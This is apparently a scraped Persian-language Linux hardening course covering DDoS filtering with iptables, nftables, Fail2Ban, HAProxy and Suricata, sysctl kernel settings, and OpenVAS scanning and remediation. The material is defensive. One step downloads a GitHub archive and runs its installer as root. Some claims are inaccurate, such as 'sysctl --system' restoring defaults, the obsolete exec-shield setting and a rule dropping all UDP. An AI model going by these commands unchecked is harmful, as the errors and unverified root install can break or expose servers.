   default_backend http_back

این تنظیم باعث می‌شود که اگر یک IP بیش از ۵۰ درخواست در ثانیه ارسال کند، درخواست‌های اضافی رد شوند.

۶.۲. ریستارت HAProxy

sudo systemctl restart haproxy

---

۷. استفاده از DDoS Deflate برای مسدودسازی حملات اتصالات مکرر

DDoS Deflate یک ابزار برای شناسایی IPهایی است که تعداد زیادی اتصال به سرور ایجاد می‌کنند.

۷.۱. دانلود و نصب DDoS Deflate

wget https://github.com/jgmdev/ddos-deflate/archive/master.zip
unzip master.zip
cd ddos-deflate-master
sudo ./install.sh

۷.۲. تنظیمات برای مسدود کردن IPهایی که بیش از ۲۰ اتصال دارند

ویرایش فایل /usr/local/ddos/ddos.conf:

NO_OF_CONNECTIONS=20
BAN_PERIOD=600

۷.۳. راه‌اندازی سرویس DDoS Deflate

sudo service ddos start

---

جمع‌بندی

• iptables و nftables برای فیلتر کردن ترافیک ناخواسته در سطح سیستم.
• Fail2Ban برای مسدودسازی خودکار IPهایی که حملات Brute Force انجام می‌دهند.
• ModSecurity برای محافظت از برنامه‌های تحت وب.
• Cloudflare برای کاهش اثر حملات DDoS با استفاده از فایروال ابری.
• HAProxy برای کنترل تعداد درخواست‌ها و جلوگیری از بار اضافی روی سرور.
• DDoS Deflate برای شناسایی و مسدود کردن IPهایی که تعداد زیادی اتصال ایجاد می‌کنند.

با ترکیب این روش‌ها، می‌توان امنیت سرورها را افزایش داده و حملات DDoS را تا حد زیادی کاهش داد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات جلوگیری از حملات Volume-based و Application-based” subtitle=”توضیحات کامل”]حملات DDoS معمولاً در دو دسته Volume-based و Application-based طبقه‌بندی می‌شوند. حملات Volume-based مانند UDP Flood، ICMP Flood و SYN Flood با ارسال حجم بالایی از داده‌ها به سرور سعی در اشغال منابع دارند، درحالی‌که حملات Application-based مانند HTTP Flood و Slowloris تلاش می‌کنند لایه‌ی اپلیکیشن را هدف قرار دهند و منابع پردازشی سرور را مصرف کنند.

در این بخش، روش‌های جلوگیری از هر دو نوع حمله را بررسی می‌کنیم و ابزارهای مختلفی را برای فیلتر کردن و محدود کردن ترافیک مخرب معرفی می‌کنیم.

---

۱. جلوگیری از حملات Volume-based (حجم بالا)

۱.۱. مسدود کردن بسته‌های غیرضروری با iptables

فیلتر کردن ICMP و UDP Flood:

sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
sudo iptables -A INPUT -p udp --dport 80 -m limit --limit 10/s -j ACCEPT
sudo iptables -A INPUT -p udp --dport 80 -j DROP

• اولین قانون، درخواست‌های Ping (ICMP) را مسدود می‌کند تا از ICMP Flood جلوگیری شود.
• دومین قانون، تعداد درخواست‌های UDP را به ۱۰ در ثانیه محدود می‌کند.
• سومین قانون، تمامی درخواست‌های اضافی را حذف می‌کند.

---

۱.۲. کاهش اثر حملات SYN Flood

sudo iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT

• تعداد درخواست‌های SYN را به ۱ عدد در ثانیه با حداکثر ۳ درخواست ناگهانی محدود می‌کند.

---

۱.۳. تنظیم Drop برای ترافیک غیرقانونی

sudo iptables -A INPUT -m state --state INVALID -j DROP
sudo iptables -A FORWARD -m state --state INVALID -j DROP

• بسته‌های نامعتبر و ناشناخته را حذف می‌کند.

---

۱.۴. استفاده از nftables برای کنترل دقیق‌تر ترافیک

sudo nft add table inet ddos_filter
sudo nft add chain inet ddos_filter input { type filter hook input priority 0 \; }
sudo nft add rule inet ddos_filter input ip protocol icmp drop
sudo nft add rule inet ddos_filter input ip protocol udp drop
sudo nft add rule inet ddos_filter input tcp flags syn limit rate 1/second burst 3 accept

• جدولی برای فیلتر ترافیک مشکوک ایجاد می‌کند و بسته‌های ICMP و UDP را مسدود می‌کند.

---

۱.۵. استفاده از Fail2Ban برای جلوگیری از حملات حجمی

sudo apt install fail2ban -y
sudo systemctl enable fail2ban --now

افزودن قانون برای مسدود کردن حملات روی HTTP:

ویرایش فایل /etc/fail2ban/jail.local و افزودن:

[http-ddos]
enabled = true
port = http,https
filter = http-ddos
logpath = /var/log/nginx/access.log
maxretry = 100
bantime = 3600

ریستارت Fail2Ban:

sudo systemctl restart fail2ban

• IP‌هایی که بیش از ۱۰۰ درخواست در مدت کوتاهی ارسال کنند، برای ۱ ساعت مسدود خواهند شد.

---

۲. جلوگیری از حملات Application-based (هدف‌گیری اپلیکیشن‌ها)

۲.۱. استفاده از ModSecurity برای محافظت از وب‌سرور

نصب ModSecurity روی Nginx:

sudo apt install libnginx-mod-security -y

فعال‌سازی در فایل /etc/nginx/nginx.conf:

modsecurity on;
modsecurity_rules_file /etc/nginx/modsec/main.conf;

ریستارت Nginx:

sudo systemctl restart nginx

• ModSecurity به‌عنوان یک فایروال لایه اپلیکیشن، درخواست‌های مخرب را فیلتر می‌کند.

---

۲.۲. جلوگیری از حملات Slowloris

Slowloris یکی از حملات رایج Application-based است که اتصالات باز را به سرور ارسال می‌کند. برای مقابله با آن:

افزودن تنظیمات زیر در Nginx:

server {
   listen 80 default_server;
   server_name _;
   keepalive_timeout 5;
   client_body_timeout 5;
   client_header_timeout 5;
   send_timeout 5;
}

ریستارت سرور:

sudo systemctl restart nginx

• زمان keepalive کاهش داده شده تا اتصالات باز طولانی‌مدت بسته شوند.

---

۲.۳. محدود کردن تعداد درخواست‌های HTTP در HAProxy

افزودن این تنظیمات به /etc/haproxy/haproxy.cfg:

frontend http_front
   bind *:80
   tcp-request connection reject if { src_conn_rate gt 50 }
   tcp-request connection track-sc0 src
   default_backend http_back

ریستارت HAProxy:

sudo systemctl restart haproxy

• اگر یک IP بیش از ۵۰ درخواست در ثانیه ارسال کند، درخواست‌های اضافی رد خواهند شد.

---

۲.۴. استفاده از Cloudflare برای محافظت از لایه‌ی اپلیکیشن

۱. فعال‌سازی “I’m Under Attack Mode” در Cloudflare
۲. تنظیم Rate Limiting برای کاهش درخواست‌های مکرر از یک IP

---

۲.۵. استفاده از Suricata برای تشخیص حملات شبکه

نصب Suricata:

sudo apt install suricata -y

ویرایش فایل /etc/suricata/suricata.yaml و افزودن قوانین:

- alert http any any -> any any (msg:"Possible HTTP Flood Attack"; flow:established,to_server; threshold:type threshold, track by_src, count 20, seconds 5; sid:100001;)

ریستارت Suricata:

sudo systemctl restart suricata

• اگر یک IP بیش از ۲۰ درخواست در ۵ ثانیه ارسال کند، هشدار داده می‌شود.

---

جمع‌بندی

✅ برای جلوگیری از حملات Volume-based:

• iptables و nftables برای مسدودسازی بسته‌های حجمی و SYN Flood.
• Fail2Ban برای تشخیص و مسدودسازی درخواست‌های بیش از حد.
• Cloudflare برای فیلتر کردن حملات UDP و ICMP در لایه ابری.

✅ برای جلوگیری از حملات Application-based:

• ModSecurity برای جلوگیری از حملات HTTP Flood و درخواست‌های مخرب.
• HAProxy برای محدود کردن تعداد درخواست‌های همزمان.
• Suricata برای نظارت بر لاگ‌ها و شناسایی درخواست‌های غیرعادی.
• Cloudflare برای جلوگیری از حملات وب مانند Slowloris.

با ترکیب این روش‌ها، می‌توان سطح امنیت سرورها را در برابر حملات DDoS در لایه شبکه و اپلیکیشن افزایش داد.[/cdb_course_lesson][cdb_course_lesson title=”فصل 3. تقویت امنیت سیستم‌های عامل”][/cdb_course_lesson][cdb_course_lesson title=”Harden کردن سیستم با استفاده از sysctl”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات امنیتی sysctl برای جلوگیری از حملات Kernel” subtitle=”توضیحات کامل”]sysctl یک ابزار مدیریت تنظیمات کرنل لینوکس است که امکان کنترل رفتار هسته سیستم عامل و افزایش امنیت را فراهم می‌کند. با استفاده از sysctl می‌توان حملات سطح کرنل مانند DoS، Spoofing، SYN Flood، و حملات Buffer Overflow را کاهش داد.

در این بخش، تنظیمات امنیتی sysctl برای جلوگیری از حملات Kernel را همراه با دستورات لازم و مسیر فایل‌های تنظیمات بررسی می‌کنیم.

---

۱. مشاهده و ویرایش تنظیمات sysctl

۱.۱. مشاهده تنظیمات فعلی

برای نمایش تمامی تنظیمات sysctl موجود در سیستم:

sudo sysctl -a

• لیستی از تمام متغیرهای sysctl و مقادیر فعلی آن‌ها نمایش داده می‌شود.

---

۱.۲. ویرایش فایل تنظیمات دائمی sysctl

تنظیمات sysctl در فایل /etc/sysctl.conf قرار دارند. برای ویرایش آن:

sudo nano /etc/sysctl.conf

• پس از تغییرات، باید تنظیمات را مجدداً بارگذاری کنیم.

---

۲. جلوگیری از حملات SYN Flood

حملات SYN Flood با ارسال تعداد زیادی بسته SYN به سرور، باعث اشغال منابع و اختلال در سرویس‌دهی می‌شوند.

۲.۱. فعال‌سازی مکانیزم محافظت در برابر SYN Flood

در فایل /etc/sysctl.conf این مقادیر را اضافه کنید:

net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 2

• net.ipv4.tcp_syncookies = 1 → فعال کردن SYN Cookies برای جلوگیری از حملات.
• net.ipv4.tcp_max_syn_backlog = 2048 → افزایش ظرفیت صف SYN برای مدیریت بهتر درخواست‌ها.
• net.ipv4.tcp_synack_retries = 2 → کاهش تعداد تلاش‌ها برای ارسال SYN-ACK.

اعمال تنظیمات:

sudo sysctl -p

---

۳. جلوگیری از IP Spoofing

برای جلوگیری از جعل آدرس IP و حملات Spoofing، تنظیمات زیر را اضافه کنید:

net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

• فعال کردن “Reverse Path Filtering” برای مسدود کردن بسته‌های جعلی.

---

۴. جلوگیری از حملات Source Routing

حملات Source Routing به مهاجم اجازه می‌دهند ترافیک را از مسیرهای خاص کنترل کند. برای غیرفعال کردن:

net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

• بسته‌هایی که دارای مسیر مشخص‌شده توسط فرستنده هستند، مسدود خواهند شد.

---

۵. جلوگیری از ارسال پاسخ‌های Broadcast

حملات مانند Smurf Attack از پاسخ‌های broadcast برای ایجاد ترافیک مخرب استفاده می‌کنند. برای جلوگیری از این حملات:

net.ipv4.icmp_echo_ignore_broadcasts = 1

• این گزینه باعث می‌شود سیستم به درخواست‌های Echo از آدرس‌های Broadcast پاسخ ندهد.

---

۶. جلوگیری از ارسال پاسخ‌های ICMP Redirect

ICMP Redirect می‌تواند توسط مهاجمان برای تغییر مسیر ترافیک و انجام حملات Man-in-the-Middle استفاده شود. برای غیرفعال کردن:

net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0

• پذیرش و ارسال درخواست‌های تغییر مسیر (ICMP Redirect) غیرفعال می‌شود.

---

۷. جلوگیری از حملات Buffer Overflow در کرنل

برای جلوگیری از حملات Buffer Overflow که منجر به اجرای کد مخرب در کرنل می‌شود:

kernel.exec-shield = 1
kernel.randomize_va_space = 2

• kernel.exec-shield = 1 → فعال کردن محافظت در برابر اجرای کدهای مخرب.
• kernel.randomize_va_space = 2 → فعال کردن تصادفی‌سازی فضای آدرس حافظه (ASLR).

---

۸. محدود کردن تعداد اتصالات نیمه‌باز (Half-Open Connections)

برای کاهش تأثیر حملات TCP Connection Exhaustion:

net.ipv4.tcp_max_orphans = 4096
net.ipv4.tcp_fin_timeout = 15

• net.ipv4.tcp_max_orphans = 4096 → محدود کردن تعداد اتصالات یتیم (Orphaned Connections).
• net.ipv4.tcp_fin_timeout = 15 → کاهش زمان انتظار برای بسته‌های FIN به ۱۵ ثانیه.

---

۹. جلوگیری از Port Scanning و حملات Reconnaissance

محدود کردن نرخ پاسخ‌های ICMP برای جلوگیری از شناسایی سرور توسط مهاجم:

net.ipv4.icmp_ratelimit = 100
net.ipv4.icmp_ratemask = 88089

• نرخ پاسخ‌های ICMP محدود شده تا مهاجم نتواند اطلاعات سرور را به‌راحتی جمع‌آوری کند.

---

۱۰. اعمال تنظیمات و بررسی تغییرات

بعد از انجام تغییرات در فایل /etc/sysctl.conf، برای اعمال آن‌ها دستور زیر را اجرا کنید:

sudo sysctl -p

برای بررسی اینکه آیا تنظیمات موردنظر به درستی اعمال شده‌اند:

sudo sysctl -a | grep "net.ipv4"

---

۱۱. بازگردانی تنظیمات پیش‌فرض sysctl

اگر به هر دلیلی بخواهید تنظیمات sysctl را به حالت پیش‌فرض بازگردانید، می‌توانید از این دستور استفاده کنید:

sudo sysctl --system

---

جمع‌بندی

✅ پیکربندی sysctl برای افزایش امنیت کرنل و کاهش حملات.
✅ جلوگیری از حملات SYN Flood، Spoofing، Smurf، ICMP Redirect، و Buffer Overflow.
✅ اعمال تنظیمات دائمی در /etc/sysctl.conf و بررسی آن‌ها با sysctl -p.
✅ مدیریت نرخ پاسخ‌ها برای جلوگیری از شناسایی سرور توسط مهاجمان.

این تنظیمات به بهبود امنیت سیستم و کاهش سطح حمله در برابر تهدیدات کرنل کمک می‌کنند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”فعال‌سازی ویژگی‌های امنیتی خاص در هسته لینوکس” subtitle=”توضیحات کامل”]امنیت هسته (Kernel Security) یکی از مهم‌ترین بخش‌های ایمن‌سازی سیستم محسوب می‌شود. با فعال‌سازی برخی ویژگی‌های امنیتی خاص، می‌توان سطح محافظت سیستم را در برابر حملات هسته‌ای، اجرای کدهای مخرب، و سوءاستفاده از آسیب‌پذیری‌های کرنل افزایش داد.

در این بخش، ویژگی‌های امنیتی پیشرفته در هسته لینوکس را بررسی کرده و نحوه فعال‌سازی آن‌ها را همراه با دستورات و مسیرهای مربوطه ارائه می‌کنیم.

---

۱. بررسی ویژگی‌های امنیتی فعال در کرنل

برای مشاهده ویژگی‌های امنیتی فعال در هسته سیستم، دستور زیر را اجرا کنید:

sudo dmesg | grep "Kernel security"

همچنین می‌توانید با استفاده از sysctl تمامی تنظیمات مرتبط با کرنل را مشاهده کنید:

sudo sysctl -a | grep "kernel"

---

۲. فعال‌سازی تصادفی‌سازی فضای آدرس (ASLR)

تصادفی‌سازی فضای آدرس (Address Space Layout Randomization – ASLR) از اجرای کدهای مخرب در حافظه جلوگیری می‌کند. برای فعال‌سازی آن، مقادیر زیر را در فایل /etc/sysctl.conf اضافه کنید:

kernel.randomize_va_space = 2

اعمال تنظیمات:

sudo sysctl -p

• مقدار 2 بالاترین سطح تصادفی‌سازی را اعمال می‌کند.
• این ویژگی حملات مبتنی بر حافظه مانند Buffer Overflow را کاهش می‌دهد.

---

۳. فعال‌سازی محدودیت‌های Core Dump

Core Dump فایل‌هایی هستند که هنگام کرش کردن برنامه‌ها ایجاد می‌شوند. این فایل‌ها می‌توانند شامل اطلاعات حساس باشند و به مهاجم امکان مهندسی معکوس بدهند. برای غیرفعال کردن:

fs.suid_dumpable = 0

اعمال تنظیمات:

sudo sysctl -p

• مقدار 0 از ایجاد فایل‌های Core Dump جلوگیری می‌کند.
• اگر نیاز به دیباگینگ باشد، مقدار 1 قابل استفاده است.

---

۴. فعال‌سازی ExecShield برای جلوگیری از اجرای کدهای مخرب

ExecShield مکانیسمی برای جلوگیری از اجرای کدهای غیرمجاز در بخش‌های خاص حافظه است.
برای فعال‌سازی، مقادیر زیر را در /etc/sysctl.conf اضافه کنید:

kernel.exec-shield = 1

اعمال تنظیمات:

sudo sysctl -p

• این ویژگی حملات سرریز بافر و اجرای کدهای مخرب را کاهش می‌دهد.

---

۵. جلوگیری از ارسال پاسخ‌های ICMP Redirect

ICMP Redirect می‌تواند برای تغییر مسیر ترافیک توسط مهاجم مورد استفاده قرار گیرد. برای غیرفعال کردن:

net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

اعمال تنظیمات:

sudo sysctl -p

• این گزینه از تغییر مسیرهای غیرمجاز جلوگیری می‌کند.

---

۶. محدود کردن پردازش بسته‌های فوروارد شده

برای جلوگیری از حملات Man-in-the-Middle و سوءاستفاده از قابلیت IP Forwarding، تنظیمات زیر را در /etc/sysctl.conf اعمال کنید:

net.ipv4.ip_forward = 0

اعمال تنظیمات:

sudo sysctl -p

• با این تنظیم، سیستم دیگر به عنوان روتر عمل نمی‌کند.

---

۷. جلوگیری از حملات Stack Clash

برای جلوگیری از حملات Stack Clash که باعث اجرای کدهای مخرب می‌شود، مقادیر زیر را در /etc/security/limits.conf اضافه کنید:

* hard stack 1048576
* soft stack 1048576

• این مقادیر حداکثر اندازه استک (Stack) را محدود می‌کنند.

---

۸. فعال‌سازی Kernel Lockdown Mode

حالت Kernel Lockdown از تغییرات غیرمجاز در کرنل جلوگیری کرده و امنیت سیستم را افزایش می‌دهد. برای بررسی وضعیت آن:

cat /sys/kernel/security/lockdown

برای فعال‌سازی آن، مقدار integrity را در فایل /etc/default/grub اضافه کنید:

GRUB_CMDLINE_LINUX="... lockdown=integrity"

اعمال تغییرات در GRUB:

sudo grub-mkconfig -o /boot/grub/grub.cfg
sudo reboot

• این گزینه از تغییرات کرنل در حین اجرا جلوگیری می‌کند.

---

۹. فعال‌سازی حالت Secure Boot در کرنل

Secure Boot از اجرای کرنل‌های غیرمجاز و تغییرات ناخواسته جلوگیری می‌کند. برای بررسی وضعیت آن:

mokutil --sb-state

برای فعال‌سازی Secure Boot در BIOS یا UEFI باید تنظیمات آن را انجام دهید.

---

۱۰. جلوگیری از ماژول‌های غیرمجاز در کرنل

برای جلوگیری از بارگذاری ماژول‌های غیرمجاز، مقدار 1 را به متغیر kernel.modules_disabled تنظیم کنید:

echo 1 > /proc/sys/kernel/modules_disabled

• پس از اجرای این دستور، امکان بارگذاری ماژول‌های جدید غیرفعال می‌شود.

---

۱۱. بررسی و اعمال تنظیمات امنیتی کرنل به‌صورت خودکار

برای بررسی و اعمال تنظیمات امنیتی sysctl، دستور زیر را اجرا کنید:

sudo sysctl --system

---

جمع‌بندی

✅ فعال‌سازی ASLR برای جلوگیری از حملات مبتنی بر حافظه
✅ غیرفعال کردن Core Dump برای محافظت از اطلاعات حساس
✅ جلوگیری از تغییر مسیر ICMP و کاهش ریسک حملات MitM
✅ محدود کردن پردازش بسته‌های فوروارد شده برای جلوگیری از سوءاستفاده
✅ فعال‌سازی Kernel Lockdown Mode و Secure Boot برای افزایش امنیت کرنل
✅ محدود کردن بارگذاری ماژول‌های کرنل برای جلوگیری از اجرای کدهای مخرب

این تنظیمات به افزایش سطح امنیت هسته لینوکس و کاهش خطرات ناشی از حملات مختلف کمک می‌کنند.[/cdb_course_lesson][cdb_course_lesson title=”تشخیص آسیب‌پذیری‌ها با استفاده از ابزارهایی مانند OpenVAS”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”نحوه نصب، راه‌اندازی، پیکربندی و اجرای اسکن امنیتی با OpenVAS” subtitle=”توضیحات کامل”]OpenVAS یکی از قدرتمندترین ابزارهای اسکن امنیتی و تشخیص آسیب‌پذیری‌ها در سیستم‌ها و شبکه‌ها است. این ابزار قابلیت شناسایی تهدیدات رایج، بررسی امنیت سرورها، سرویس‌ها، پورت‌ها و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها را داراست.

در این بخش، نحوه نصب، راه‌اندازی، پیکربندی و اجرای اسکن امنیتی با OpenVAS همراه با دستورات موردنیاز و مسیرهای مربوطه ارائه خواهد شد.

---

۱. نصب OpenVAS در لینوکس

برای نصب OpenVAS در سیستم‌عامل‌های مختلف، مراحل زیر را دنبال کنید.

نصب در Ubuntu و Debian

sudo apt update && sudo apt install -y openvas

نصب در CentOS و RHEL

sudo yum install -y epel-release
sudo yum install -y openvas

نصب در Arch Linux

sudo pacman -S openvas

پس از نصب، باید پایگاه داده آسیب‌پذیری‌ها را بروزرسانی کرده و سرویس OpenVAS را فعال کنید.

---

۲. بروزرسانی پایگاه داده آسیب‌پذیری‌ها

sudo greenbone-feed-sync

این دستور اطلاعات مربوط به آسیب‌پذیری‌های جدید را از سرورهای Greenbone دانلود کرده و پایگاه داده OpenVAS را به‌روز می‌کند.

---

۳. راه‌اندازی سرویس OpenVAS

فعال‌سازی و اجرای سرویس

sudo systemctl enable --now openvas
sudo systemctl start openvas

بررسی وضعیت سرویس

sudo systemctl status openvas

• در صورت اجرا نشدن، لاگ‌های مربوط به OpenVAS را بررسی کنید:

sudo journalctl -u openvas --no-pager

---

۴. تنظیمات اولیه OpenVAS

پس از نصب و اجرای OpenVAS، باید یک کاربر جدید برای ورود به پنل مدیریتی ایجاد کنید.

sudo runuser -u _gvm -- gvmd --create-user=openvas_admin --password=StrongPassword123!

با این دستور، یک کاربر با نام openvas_admin و رمز عبور StrongPassword123! ایجاد می‌شود. می‌توانید رمز را به مقدار دیگری تغییر دهید.

---

۵. اجرای OpenVAS Web Interface

پس از تنظیمات اولیه، برای دسترسی به پنل تحت وب OpenVAS، آدرس زیر را در مرورگر خود وارد کنید:

https://<IP-Address>:9392

• <IP-Address> را با آدرس سرور OpenVAS جایگزین کنید.
• از نام کاربری و رمز عبور ایجادشده استفاده کنید.

---

۶. اجرای اسکن امنیتی برای شناسایی آسیب‌پذیری‌ها

اجرای اسکن روی یک سرور خاص

gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' \
         socket --xml '<create_target><name>MyServer</name><hosts>192.168.1.10</hosts></create_target>'

• در اینجا سرور 192.168.1.10 برای اسکن هدف قرار گرفته است.
• می‌توان چندین IP را با جدا کردن آن‌ها با , مشخص کرد.

اجرای اسکن روی کل شبکه داخلی

gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' \
         socket --xml '<create_target><name>Local Network</name><hosts>192.168.1.0/24</hosts></create_target>'

• این دستور کل شبکه 192.168.1.0/24 را اسکن می‌کند.

---

۷. مشاهده نتایج اسکن و تحلیل آسیب‌پذیری‌ها

مشاهده لیست آسیب‌پذیری‌ها از طریق CLI

gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' \
         socket --xml '<get_reports/>'

بررسی گزارش‌ها در وب‌اینترفیس

در پنل OpenVAS، می‌توان لیست آسیب‌پذیری‌های شناسایی‌شده، میزان خطر و راهکارهای پیشنهادی را مشاهده کرد.

---

۸. تنظیم اسکن خودکار برای شناسایی مداوم آسیب‌پذیری‌ها

برای اجرای خودکار اسکن‌های امنیتی، می‌توان از cronjob استفاده کرد.

crontab -e

و اضافه کردن این خط برای اجرای اسکن هر روز در ساعت ۲ بامداد:

0 2 * * * gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' socket --xml '<create_task>...</create_task>'

• این کار باعث افزایش امنیت مداوم شبکه و سرورها خواهد شد.

---

۹. بهینه‌سازی عملکرد OpenVAS

برای بهینه‌سازی و جلوگیری از مصرف بیش از حد منابع، تنظیمات زیر را انجام دهید:

محدود کردن مصرف CPU و RAM

sudo nano /etc/systemd/system/openvas.service

و اضافه کردن مقادیر زیر:

[Service]
CPUShares=1024
MemoryMax=1G

سپس سرویس را ری‌استارت کنید:

sudo systemctl daemon-reload
sudo systemctl restart openvas

• این کار باعث بهینه‌سازی مصرف منابع سرور می‌شود.

---

جمع‌بندی

✅ نصب و راه‌اندازی OpenVAS در لینوکس
✅ بروزرسانی پایگاه داده آسیب‌پذیری‌ها برای تشخیص تهدیدات جدید
✅ اجرای اسکن امنیتی روی سرورها و شبکه‌ها
✅ تحلیل گزارش‌های OpenVAS و یافتن نقاط ضعف سیستم
✅ اجرای اسکن‌های دوره‌ای برای افزایش امنیت مداوم
✅ بهینه‌سازی عملکرد OpenVAS برای جلوگیری از مصرف بیش از حد منابع

این روش‌ها به شما کمک می‌کنند امنیت شبکه و سرورهای خود را در برابر تهدیدات مختلف افزایش دهید.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”رفع آسیب‌پذیری‌ها و به‌روزرسانی نرم‌افزارها پس از اسکن با OpenVAS” subtitle=”توضیحات کامل”]پس از اجرای اسکن‌های امنیتی با OpenVAS و شناسایی آسیب‌پذیری‌ها، مرحله‌ی بعدی رفع این آسیب‌پذیری‌ها و به‌روزرسانی نرم‌افزارها است. در این بخش، نحوه تجزیه‌وتحلیل گزارش‌های OpenVAS، رفع مشکلات امنیتی، بروزرسانی سرویس‌ها و تقویت امنیت سیستم بررسی خواهد شد.

---

۱. بررسی و تحلیل گزارش‌های OpenVAS

پس از اجرای اسکن، می‌توان نتایج را در وب‌اینترفیس OpenVAS مشاهده کرد یا از طریق خط فرمان دریافت کرد.

مشاهده گزارش‌ها در وب‌اینترفیس

۱. وارد OpenVAS شوید:

https://<IP-Address>:9392

۲. به بخش Reports بروید و نتایج اسکن را بررسی کنید.
۳. برای هر آسیب‌پذیری، سطح خطر (Critical, High, Medium, Low) و توضیحات مرتبط نمایش داده می‌شود.

دریافت گزارش آسیب‌پذیری‌ها در CLI

gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' \
         socket --xml '<get_reports/>'

این دستور لیست آسیب‌پذیری‌ها، سطح خطر و توصیه‌های اصلاحی را ارائه می‌دهد.

---

۲. رفع آسیب‌پذیری‌های شناسایی‌شده

الف) به‌روزرسانی نرم‌افزارهای آسیب‌پذیر

بیشتر آسیب‌پذیری‌ها ناشی از نسخه‌های قدیمی نرم‌افزارها و سیستم‌عامل هستند. برای بروزرسانی:

در Ubuntu / Debian:

sudo apt update && sudo apt upgrade -y

در CentOS / RHEL:

sudo yum update -y

در Arch Linux:

sudo pacman -Syu

ب) بررسی و بروزرسانی کرنل لینوکس

برای رفع آسیب‌پذیری‌های کرنل، بهتر است آخرین نسخه کرنل را نصب کنید:

sudo apt install --only-upgrade linux-generic
sudo reboot

• این کار، کرنل را به جدیدترین نسخه ارتقا می‌دهد و حملات Kernel Exploit را کاهش می‌دهد.

---

۳. تنظیمات امنیتی برای جلوگیری از حملات آینده

الف) غیرفعال کردن سرویس‌های غیرضروری

sudo systemctl list-units --type=service --state=running
sudo systemctl stop <service_name>
sudo systemctl disable <service_name>

• بررسی کنید چه سرویس‌هایی فعال هستند و سرویس‌های ناامن یا غیرضروری را غیرفعال کنید.

ب) تنظیمات امنیتی در sysctl.conf برای جلوگیری از حملات Kernel

sudo nano /etc/sysctl.conf

افزودن تنظیمات زیر:

# جلوگیری از حملات SYN Flood
net.ipv4.tcp_syncookies = 1

# غیرفعال کردن پاسخ به درخواست‌های ICMP Broadcast
net.ipv4.icmp_echo_ignore_broadcasts = 1

# جلوگیری از Source Routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

اعمال تنظیمات:

sudo sysctl -p

• این کار حملات DDoS، ICMP Flood و Spoofing را کاهش می‌دهد.

---

۴. رفع آسیب‌پذیری‌های مربوط به SSH

الف) غیرفعال کردن ورود Root از طریق SSH

sudo nano /etc/ssh/sshd_config

خط زیر را پیدا کرده و مقدار آن را به no تغییر دهید:

PermitRootLogin no

سپس سرویس را ری‌استارت کنید:

sudo systemctl restart sshd

• این کار باعث جلوگیری از حملات Brute Force روی کاربر root می‌شود.

ب) استفاده از احراز هویت کلید عمومی (Key-Based Authentication)

ssh-keygen -t rsa -b 4096
ssh-copy-id user@server

• ورود با رمز عبور را غیرفعال کنید تا امنیت افزایش یابد.

---

۵. رفع آسیب‌پذیری‌های شبکه و فایروال

الف) تنظیم فایروال iptables

sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -j DROP

• این تنظیمات باعث می‌شود فقط پورت‌های ضروری باز باشند و سایر درخواست‌ها مسدود شوند.

ب) استفاده از fail2ban برای جلوگیری از حملات Brute Force

sudo apt install fail2ban -y
sudo systemctl enable --now fail2ban

• fail2ban تلاش‌های ناموفق ورود را شناسایی کرده و آی‌پی‌های مخرب را بلاک می‌کند.

---

۶. اسکن مجدد پس از رفع آسیب‌پذیری‌ها

برای اطمینان از اینکه مشکلات رفع شده‌اند، مجدداً اسکن OpenVAS را اجرا کنید:

gvm-cli --gmp-username openvas_admin --gmp-password 'StrongPassword123!' \
         socket --xml '<create_task>...</create_task>'

پس از اتمام اسکن، بررسی کنید که آسیب‌پذیری‌های قبلی حذف شده‌اند.

---

جمع‌بندی

✅ بررسی و تحلیل گزارش‌های OpenVAS
✅ بروزرسانی سیستم‌عامل و نرم‌افزارهای آسیب‌پذیر
✅ تقویت امنیت SSH و محدود کردن ورود کاربران
✅ بهبود تنظیمات فایروال و جلوگیری از حملات Brute Force
✅ اجرای اسکن‌های مجدد پس از رفع مشکلات

این مراحل باعث افزایش امنیت سرورها، جلوگیری از حملات سایبری و کاهش آسیب‌پذیری‌ها می‌شوند.[/cdb_course_lesson][cdb_course_lesson title=”فصل 4. محافظت از اطلاعات و رمزنگاری”][/cdb_course_lesson][cdb_course_lesson title=”رمزنگاری اطلاعات حساس”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از GPG برای رمزنگاری ایمیل‌ها و فایل‌ها” subtitle=”توضیحات کامل”]GPG (GnuPG) یک ابزار متن‌باز برای رمزنگاری و امضای دیجیتال است که از استاندارد OpenPGP پیروی می‌کند. با استفاده از GPG می‌توان ایمیل‌ها، فایل‌ها و دیگر داده‌های حساس را رمزگذاری کرده و امنیت اطلاعات را افزایش داد.

نصب GPG

در اکثر توزیع‌های لینوکسی GPG به‌صورت پیش‌فرض نصب است، اما در صورت نیاز می‌توان آن را نصب کرد:

